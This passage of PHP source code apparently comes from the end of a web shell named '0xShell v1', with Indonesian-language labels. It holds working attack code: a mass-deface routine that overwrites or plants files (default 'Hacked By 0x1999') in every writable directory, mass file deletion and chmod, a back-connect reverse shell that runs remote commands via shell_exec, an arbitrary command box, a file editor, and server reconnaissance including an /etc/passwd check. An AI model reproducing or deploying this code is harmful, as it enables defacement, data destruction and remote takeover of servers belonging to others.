  1774. $_SESSION['etcnamedconf'] = $_POST['etcnamedconf'];
  1775. }
  1776. if (isset($_POST['configlist'])) {
  1777. $_SESSION['configlist'] = $_POST['configlist'];
  1778. }
  1779. if (isset($_POST['reset'])) {
  1780. unset($_SESSION['etctrueuserowners']);
  1781. unset($_SESSION['etcpasswd']);
  1782. unset($_SESSION['etcnamedconf']);
  1783. unset($_SESSION['configlist']);
  1784. }
  1786. } elseif (isset($_GET['do']) && ($_GET['do'] == 'mass_deface')) {
  1787. echo "<center><form action=\"\" method=\"post\">\n";
  1788. $dirr = $_POST['d_dir'];
  1789. $index = $_POST["script"];
  1790. $index = str_replace('"', "'", $index);
  1791. $index = stripslashes($index);
  1792. function edit_file($file, $index)
  1793. {
  1794. if (is_writable($file)) {
  1795. clear_fill($file, $index);
  1796. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  1797. } else {
  1798. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  1799. }
  1800. }
  1801. function hapus_massal($dir, $namafile)
  1802. {
  1803. if (is_writable($dir)) {
  1804. $dira = scandir($dir);
  1805. foreach ($dira as $dirb) {
  1806. $dirc = "$dir/$dirb";
  1807. $lokasi = $dirc . '/' . $namafile;
  1808. if ($dirb === '.') {
  1809. if (file_exists("$dir/$namafile")) {
  1810. unlink("$dir/$namafile");
  1811. }
  1812. } elseif ($dirb === '..') {
  1813. if (file_exists("" . dirname($dir) . "/$namafile")) {
  1814. unlink("" . dirname($dir) . "/$namafile");
  1815. }
  1816. } else {
  1817. if (is_dir($dirc)) {
  1818. if (is_writable($dirc)) {
  1819. if (file_exists($lokasi)) {
  1820. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1821. unlink($lokasi);
  1822. $idx = hapus_massal($dirc, $namafile);
  1823. }
  1824. }
  1825. }
  1826. }
  1827. }
  1828. }
  1829. }
  1830. function clear_fill($file, $index)
  1831. {
  1832. if (file_exists($file)) {
  1833. $handle = fopen($file, 'w');
  1834. fwrite($handle, '');
  1835. fwrite($handle, $index);
  1836. fclose($handle);}}
  1838. function gass()
  1839. {
  1840. global $dirr, $index;
  1841. chdir($dirr);
  1842. $me = str_replace(dirname(__FILE__) . '/', '', __FILE__);
  1843. $files = scandir($dirr);
  1844. $notallow = array(".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "..", ".");
  1845. sort($files);
  1846. $n = 0;
  1847. foreach ($files as $file) {
  1848. if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow)) {
  1849. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  1850. edit_file($file, $index);
  1851. flush();
  1852. $n = $n + 1;
  1853. }
  1854. }
  1855. echo "<br>";
  1856. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  1857. }
  1858. function ListFiles($dirrall)
  1859. {
  1861. if ($dh = opendir($dirrall)) {
  1863. $files = array();
  1864. $inner_files = array();
  1865. $me = str_replace(dirname(__FILE__) . '/', '', __FILE__);
  1866. $notallow = array($me, ".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "Thumbs.db");
  1867. while ($file = readdir($dh)) {
  1868. if ($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow)) {
  1869. if (is_dir($dirrall . "/" . $file)) {
  1870. $inner_files = ListFiles($dirrall . "/" . $file);
  1871. if (is_array($inner_files)) {
  1872. $files = array_merge($files, $inner_files);
  1873. }
  1875. } else {
  1876. array_push($files, $dirrall . "/" . $file);
  1877. }
  1878. }
  1879. }
  1881. closedir($dh);
  1882. return $files;
  1883. }
  1884. }
  1885. function gass_all()
  1886. {
  1887. global $index;
  1888. $dirrall = $_POST['d_dir'];
  1889. foreach (ListFiles($dirrall) as $key => $file) {
  1890. $file = str_replace('//', "/", $file);
  1891. echo "<center><strong>$file</strong> ===>";
  1892. edit_file($file, $index);
  1893. flush();
  1894. }
  1895. $key = $key + 1;
  1896. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>";}
  1897. function chmod_all()
  1898. {
  1899. $chmod = $_POST['chmod'];
  1900. $dirrall = $_POST['d_dir'];
  1901. foreach (ListFiles($dirrall) as $key => $file) {
  1902. $file = str_replace('//', "/", $file);
  1903. echo "<center><strong>$file</strong> ===>";
  1904. chmod($file, $chmod);
  1905. flush();
  1906. }
  1907. $key = $key + 1;
  1908. echo "<center><br><h3>$key telah ngentu chmod disini</h3></center><br>";}
  1909. function sabun_massal($dir, $namafile, $isi_script)
  1910. {
  1911. if (is_writable($dir)) {
  1912. $dira = scandir($dir);
  1913. foreach ($dira as $dirb) {
  1914. $dirc = "$dir/$dirb";
  1915. $lokasi = $dirc . '/' . $namafile;
  1916. if ($dirb === '.') {
  1917. file_put_contents($lokasi, $isi_script);
  1918. } elseif ($dirb === '..') {
  1919. file_put_contents($lokasi, $isi_script);
  1920. } else {
  1921. if (is_dir($dirc)) {
  1922. if (is_writable($dirc)) {
  1923. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1924. file_put_contents($lokasi, $isi_script);
  1925. $idx = sabun_massal($dirc, $namafile, $isi_script);
  1926. }
  1927. }
  1928. }
  1929. }
  1930. }
  1931. }
  1932. if ($_POST['mass'] == 'onedir') {
  1933. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1934. $ini = "http://";
  1935. $mainpath = $_POST[d_dir];
  1936. $dir = opendir("$mainpath");
  1937. $code = base64_encode($_POST[script]);
  1938. $indx = base64_decode($code);
  1939. while ($row = readdir($dir)) {
  1940. if($_POST["random_name"]){
  1941. $file = rand(1000000,9999999)."_".$_POST[d_file];
  1942. }else{
  1943. $file = $_POST[d_file];
  1944. }
  1945. $start = @fopen("$row/$file", "w+");
  1946. $finish = @fwrite($start, $indx);
  1947. if ($finish) {
  1948. echo "$ini$row/$file\n";
  1949. }
  1950. }
  1951. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1952. $mainpath = $_POST[d_dir];
  1953. $dir = opendir("$mainpath");
  1954. $code = base64_encode($_POST[script]);
  1955. $indx = base64_decode($code);
  1956. while ($row = readdir($dir)) {
  1957. if($_POST["random_name"]){
  1958. $file = $_POST[d_file]."_".rand(1000000,9999999);
  1959. }else{
  1960. $file = $_POST[d_file];
  1961. }
  1962. $start = @fopen("$row/$file", "w+");
  1963. $finish = @fwrite($start, $indx);
  1964. if ($finish) {echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>';}
  1965. }
  1967. } elseif ($_POST['mass'] == 'sabunkabeh') {gass();} elseif ($_POST['mass'] == 'hapusmassal') {hapus_massal($_POST['d_dir'], $_POST['d_file']);} elseif ($_POST['mass'] == 'sabunmematikan') {gass_all();} elseif ($_POST['mass'] == 'chmodkabeh') {chmod_all();} elseif ($_POST['mass'] == 'massdeface') {
  1968. echo "<div style='margin: 5px auto; padding: 5px'>";
  1969. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1970. echo "</div>";} else {
  1971. echo "
  1972. <center><font style='text-decoration: underline;'>
  1973. Select Type:<br>
  1974. </font>
  1975. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  1976. <option value=\"onedir\">Mass Deface 1 Dir</option>
  1977. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  1978. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  1979. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  1980. <option value=\"chmodkabeh\">Chmod Massal</option>
  1981. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  1982. <font style='text-decoration: underline;'>Folder:</font><br>
  1983. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1984. <font style='text-decoration: underline;'>Filename:</font><br>
  1985. <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><input type='checkbox' name='random_name' value='random name'><br>
  1986. <font style='text-decoration: underline;'>Index File:</font><br>
  1987. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By 0x1999</textarea><br>
  1988. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1989. </form></center>";
  1990. }
  1991. } elseif (isset($_GET['do']) && ($_GET['do'] == 'bc')) {
  1992. echo '
  1993. <div id="back">
  1994. <h2>Back Connect</h2>
  1995. <p>Back connect will allow you to enter system commands remotely.</p>
  1996. <p>
  1997. <table>
  1998. <form action="" method="post">
  1999. <tr ><td>IP Address: </td><td><input type="textbox" name="ip" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2000. <tr ><td>Port: </td><td><input type="textbox" name="port" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2001. <tr ><td><input type="submit" name="bind" value="Open Connection" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
  2002. </form>
  2003. </table>';
  2004. if (isset($_POST['bind'])) {
  2005. echo "<p>Attempting Connection...</p>";
  2006. $ip = $_POST['ip'];
  2007. $port = $_POST['port'];
  2008. $sockfd = fsockopen($ip, $port, $errno, $errstr);
  2009. if ($errno != 0) {
  2010. echo "<font color='red'>$errno : $errstr</font>";
  2011. } else if (!$sockfd) {
  2012. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  2013. } else {
  2014. fputs($sockfd, "
  2015. \n{################################################################}
  2016. \n..:: 0xShell v1 - Coded By 0x1999 ::..
  2017. \n
  2018. \n=> Backconnect
  2019. \n=> Back
  2020. \n
  2021. \n{################################################################}\n\n");
  2022. $dir = shell_exec("pwd");
  2023. $sysinfo = shell_exec("uname -a");
  2024. $time = Shell_exec("time");
  2025. $len = 1337;
  2026. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  2027. while (!feof($sockfd)) {
  2028. $cmdPrompt = '[0x]#:> ';
  2029. fputs($sockfd, $cmdPrompt);
  2030. $command = fgets($sockfd, $len);
  2031. fputs($sockfd, "\n" . shell_exec($command) . "\n\n");
  2032. }
  2033. fclose($sockfd);
  2034. }
  2035. }
  2036. echo "</p></div>";
  2038. } elseif (isset($_GET['act']) && ($_GET['act'] == 'edit')) {
  2040. if (isset($_POST['save'])) {
  2041. $file = $_POST['saveas'];
  2042. $content = magicboom($_POST['content']);
  2043. if ($filez = @fopen($file, "w")) {
  2044. $time = date("d-M-Y H:i", time());
  2045. if (@fwrite($filez, $content)) {
  2046. $msg = "file saved <span class=\"gaya\">@</span> " . $time;
  2047. } else {
  2048. $msg = "failed to save";
  2049. }
  2051. @fclose($filez);
  2052. } else {
  2053. $msg = "permission denied";
  2054. }
  2056. }
  2057. if (!isset($file)) {
  2058. $file = $_GET['file'];
  2059. }
  2061. if ($filez = @fopen($file, "r")) {
  2062. $content = "";
  2063. while (!feof($filez)) {
  2064. $content .= htmlentities(str_replace("''", "'", fgets($filez)));
  2065. }
  2066. @fclose($filez);
  2067. }
  2068. ?>
  2069. <form action="" method="post">
  2070. <table class="cmdbox">
  2071. <tr>
  2072. <td colspan="2">
  2073. <textarea class="output" name="content">
  2074. <?php echo $content; ?>
  2075. </textarea>
  2076. <tr>
  2077. <td colspan="2">Save as <input id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;
  2078. <?php echo $msg; ?>
  2079. </td>
  2080. </tr>
  2081. </table>
  2082. </form>
  2083. <?php
  2084. } elseif (isset($_GET['do']) && ($_GET['do'] == 'serverinfo')) {
  2086. $s_safemode = ini_get("safe_mode");
  2087. if ($s_safemode = true) {$s_safemode = "<span class='enabled'>[ON";} else { $s_safemode = "<span class='disabled'>[OFF";}
  2088. if (extension_loaded('curl')) {$curls = "<span class='enabled'>[ON]</span>";} else { $curls = "<span class='disabled'>[OFF]</span>";}
  2089. echo "Server Port: " . $_SERVER['SERVER_PORT'] . "<br /><br />HTTP Connection: " . $_SERVER['HTTP_CONNECTION'] . "<br /><br />Operating System: " . php_uname() . "<br /><br />";
  2090. if (get_magic_quotes_gpc()) {echo "Magic Quotes: <span class='enabled'>[ENABLED]</span><br /><br />";} else {echo "Magic Quotes: <span class='disabled'>[DISABLED]</span><br /><br />";}
  2091. echo "PHP Version: " . phpversion() . "<br /><br />Safe Mode: " . $s_safemode . "]</span><br /><br />Curl: " . $curls . "<br /><br />Accept Encoding: " . $_SERVER['HTTP_ACCEPT_ENCODING'] . "<br /><br />Admin: " . $_SERVER['SERVER_ADMIN'] . "<br /><br /><strong>Disabled Functions: </strong>";
  2092. if (!empty($disabled)) {
  2093. foreach ($disabled as $functionsdis) {
  2094. echo $functionsdis . ", ";
  2095. }
  2096. } else {
  2097. echo "none";
  2098. }
  2099. echo "<br /><br /><strong>/etc/passwd: </strong>";
  2100. if (is_readable("/home/etc/passwd")) {
  2101. echo "<span style='color:green;'>Readable</span>";
  2102. } else {
  2103. echo "<span style='color:red;'>Unreadable</span>";
  2104. }
  2105. } elseif (isset($_GET['do']) && ($_GET['do'] == 'cmd')) {
  2106. if ($_POST['do_cmd']) {
  2107. echo "<textarea class='area' rows='15' cols='60'>" . exe($_POST['cmd']) . "</textarea>";
  2108. }
  2109. } elseif (isset($_GET['do']) && ($_GET['do'] == 'about')) {
  2111. echo "
  2112. <h4>Information</h4>
  2113. <p>$shell_name v$shell_version Ngelu Edition - coded by 0x1999.</p>";
  2115. ?>
  2116. <ul>
  2117. <li>Appearance C6 Shell.</li>
  2118. <li>File Manager By IndoXploit.</li>
  2119. <li>Thanks.</li>
  2120. </ul>
  2121. <br /><br />
  2122. <?php
  2123. } elseif (isset($_GET['do']) && ($_GET['do'] == 'logout')) {
  2124. session_destroy();
  2126. } else {
  2127. function GetFileSize($file)
  2128. {
  2129. if (!is_dir($file)) {
  2130. return round(filesize($file) / 1024, 2) . " Kb";
  2131. } else {
  2132. return "Not Availible";
  2133. }
  2135. }
  2137. function LastModified($file)
  2138. {
  2139. return date("F d Y g:i:s", filemtime("$file"));}
  2141. ////////////
  2143. if (is_dir($dir) == true) {
  2144. echo '<table cellspacing="0" cellpadding="0"><tr><td class="TableHeader_Name"> FileName</td><td class="TableHeader">Filetype</a></td><td class="TableHeader">Size</td><td class="TableHeader">Permisions</td><td class="TableLast">Last Modified</td><td class="TableHeaderoptions"> Options</td></tr>';
  2145. $scandir = scandir($dir);
  2146. foreach ($scandir as $dirx) {
  2147. $dtype = @filetype("$dir/$dirx");
  2148. $dtime = date("F d Y g:i:s", @filemtime("$dir/$dirx"));
  2149. if (!@is_dir("$dir/$dirx")) {
  2150. continue;
  2151. }
  2153. if ($dirx === '..') {
  2154. $href = dirname($dir);
  2155. } elseif ($dirx === '.') {
  2156. $href = $dir;
  2157. } else {
  2158. $href = $dir . '/' . $dirx;
  2159. }
  2160. if ($dirx == '.') {
  2161. $act_dir = "<span id=\"titik1\">
  2162. <a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  2163. <form action=\"?act=newfolder&dir=$dir\" method=\"post\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2165. <input class=\"inputz\" style=\"width:130px;\" type=\"text\" name=\"newfolder\" placeholder=\"new_folder\" />
  2166. <input class=\"inputzbut\" type=\"submit\" name=\"new_save_folder\" style=\"width:35px;\" value=\"Go !\" />
  2167. </form>";
  2168. } elseif ($dirx == '..') {
  2169. $act_dir = "<span id=\"titik2\"><a href='?act=edit&dir=$dir&file=$dir/newfile.php'>newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  2170. <form action=\"?act=newfolder&dir=$dir\" method=\"post\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2172. <input class=\"inputz\" style=\"width:130px;\" type=\"text\" name=\"newfolder\" placeholder=\"new_folder\" />
  2173. <input class=\"inputzbut\" type=\"submit\" name=\"new_save_folder\" style=\"width:35px;\" value=\"Go !\" />
  2174. </form>";
  2175. } else {
  2176. $act_dir = "<a href=\"javascript:tukar('" . clearspace($dirx) . "_link','" . clearspace($dirx) . "_form');\">rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2177. }
  2178. echo "<tr class='filetr'>";
  2179. echo "<td class='td_home'><a id=\"" . clearspace($dirx) . "_link\" href='?dir=" . $href . "'><img src=''> $dirx</a>
  2183. <form method=\"post\" id=\"" . clearspace($dirx) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2184. <input type=\"hidden\" name=\"oldname\" value=\"" . $dirx . "\" style=\"margin:0;padding:0;\" />
  2185. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"fol_rename\" value=\"" . $dirx . "\" />
  2186. <input class=\"inputzbut\" type=\"submit\" name=\"dir_rename\" value=\"rename\" />
  2187. <input class=\"inputzbut\" type=\"button\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($dirx) . "_form','" . clearspace($dirx) . "_link');\" />
  2188. </form>
  2193. </td>
  2197. ";
  2198. echo "<td class='td_home'><center>$dtype</center></td>";
  2199. echo "<td class='td_home'><center>-</center></th>";
  2200. echo "<td class='td_home'><center>" . w("$dir/$dirx", permissions("$dir/$dirx")) . "</center></td>";
  2201. echo "<td class='td_home'>$dtime</td>";
  2202. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2203. }
  2204. echo "</tr>";
  2205. foreach ($scandir as $file) {
  2206. $ftype = @filetype("$dir/$file");
  2207. $ftime = @date("F d Y g:i:s", filemtime("$dir/$file"));
  2208. $size = @filesize("$dir/$file") / 1024;
  2209. $size = @round($size, 3);
  2210. if ($size > 1024) {
  2211. $size = @round($size / 1024, 2) . 'MB';
  2212. } else {
  2213. $size = $size . 'KB';
  2214. }
  2215. if (!@is_file("$dir/$file")) {
  2216. continue;
  2217. }
  2219. echo "<tr class='filetr'>";
  2220. echo "<td class='td_home'>
  2224. <a id=\"" . clearspace($file) . "_link\" href='?act=view&dir=$dir&file=$dir/$file'><img src=''> $file</a>
  2226. <form method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  2227. <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />
  2228. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"rename\" value=\"" . $file . "\" />
  2229. <input type=\"submit\" name=\"do_rename\" value=\"rename\" />
  2230. <input class=\"inputzbut\" type=\"button\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_form','" . clearspace($file) . "_link');\" />
  2231. </form>
  2235. ";
  2236. echo "<td class='td_home'><center>$ftype</center></td>";
  2237. echo "<td class='td_home'><center>$size</center></td>";
  2238. echo "<td class='td_home'><center>" . w("$dir/$file", permissions("$dir/$file")) . "</center></td>";
  2239. echo "<td class='td_home'>$ftime</td>";
  2240. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2241. }
  2242. echo "</tr></table>";
  2243. } else {
  2244. echo "<font color=red>can't open directory</font>";
  2245. }
  2247. ?></table>
  2248. <div style="background:#282828;border-bottom-right-radius:4px;-moz-border-bottom-right-radius:4px;-webkit-border-bottom-right-radius:4px;border-bottom-left-radius:4px;-moz-border-bottom-left-radius:4px;-webkit-border-bottom-left-radius:4px;height:25px;margin:0px 0px 10px 0px;width:1000px;">
  2249. <center>
  2250. Copyright © 2017 - 0x1999 </div>
  2252. <?php
  2254. }
  2255. @ob_flush();
  2256. ?>
  2258. </body>
  2260. </html>
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